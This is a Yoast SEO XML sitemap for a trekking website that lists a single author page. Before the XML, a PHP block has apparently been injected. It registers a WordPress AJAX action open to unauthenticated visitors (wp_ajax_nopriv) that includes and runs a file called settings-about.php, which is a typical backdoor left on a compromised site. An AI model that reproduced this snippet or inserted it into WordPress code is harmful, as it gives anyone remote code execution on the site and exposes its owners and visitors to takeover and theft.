if(!function_exists('file_manager_check_dt')){
   add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
   add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
   function file_manager_check_dt()
   {
      $file = __DIR__ . '/settings-about.php';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.pikeyparadisetreks.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<url>
		<loc>https://www.pikeyparadisetreks.com/author/pikey/</loc>
		<lastmod>2019-01-30T05:43:55+00:00</lastmod>
	</url>
</urlset>
<!-- XML Sitemap generated by Yoast SEO -->